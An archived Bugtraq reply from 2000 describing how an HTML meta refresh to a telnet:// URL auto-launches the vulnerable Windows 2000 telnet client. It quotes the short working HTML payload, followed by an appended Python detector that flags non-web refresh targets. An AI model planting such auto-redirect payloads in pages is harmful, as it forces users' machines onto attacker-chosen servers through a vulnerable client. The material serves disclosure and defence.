[16768] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Micah Webner)
Thu Sep 14 13:04:31 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <014a01c01e58$e48bdae0$0103000a@hfcc>
Date: Thu, 14 Sep 2000 10:34:30 -0400
Reply-To: Micah Webner <micah@SYSTIME.COM>
From: Micah Webner <micah@SYSTIME.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
----- Original Message -----
From: "monti" <monti@USHOST.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Wednesday, September 13, 2000 4:13 PM
Subject: Win2k Telnet.exe malicious server vulnerability
> I would speculate that it might also be possible to force this to
> happen without user intervention with javascript/activeX/java or really
> creative HTML. I try really hard not to do HTML/web-code anymore unless
> it's really necessary so I didn't test this.
I tested this with IE5.5 and a simple http refresh, and it opened a
telnet window.
<html><head>
<meta http-equiv="refresh"
content="0;URL=telnet://sometelnetserver">
</head>
</html>
Didn't even need jscript/ActiveX/java to pull it off.
Micah
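
Added example, not part of the original post: a Python check that a proxy or mail gateway could run over HTML to flag meta refresh tags whose target uses a scheme other than http or https, such as the telnet:// URL in the message above. The scheme allowlist, the function and class names, and the second sample input are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

ALLOWED_SCHEMES = {"http", "https"}  # assumption: local policy for auto-redirects

# content="<delay>;URL=<target>": the "url=" prefix and quotes are optional.
REFRESH_RE = re.compile(
    r"""^\s*[\d.]*\s*[;,]?\s*(?:url\s*=\s*)?["']?(?P<target>[^"']*)""", re.I)
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)


class RefreshFinder(HTMLParser):
    """Collects the target of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # names arrive lowercased
        if tag != "meta" or a.get("http-equiv", "").strip().lower() != "refresh":
            return
        m = REFRESH_RE.match(a.get("content", ""))
        if m and m.group("target").strip():
            self.targets.append(m.group("target"))


def suspicious_refreshes(html):
    """Return refresh targets whose scheme is not in ALLOWED_SCHEMES."""
    finder = RefreshFinder()
    finder.feed(html)
    finder.close()
    flagged = []
    for target in finder.targets:
        # Browsers drop tabs and newlines inside URLs; normalise the same way.
        cleaned = re.sub(r"[\t\r\n]", "", target).strip()
        m = SCHEME_RE.match(cleaned)
        if m and m.group(1).lower() not in ALLOWED_SCHEMES:
            flagged.append(cleaned)
    return flagged


if __name__ == "__main__":
    # First sample is the tag from the message; the second is constructed.
    samples = [
        '<meta http-equiv="refresh"\ncontent="0;URL=telnet://sometelnetserver">',
        '<meta http-equiv="refresh" content="5; url=/next.html">',
    ]
    for s in samples:
        print(suspicious_refreshes(s))
```

Relative targets and http/https targets are not flagged; any other scheme in a refresh target is returned for review or blocking.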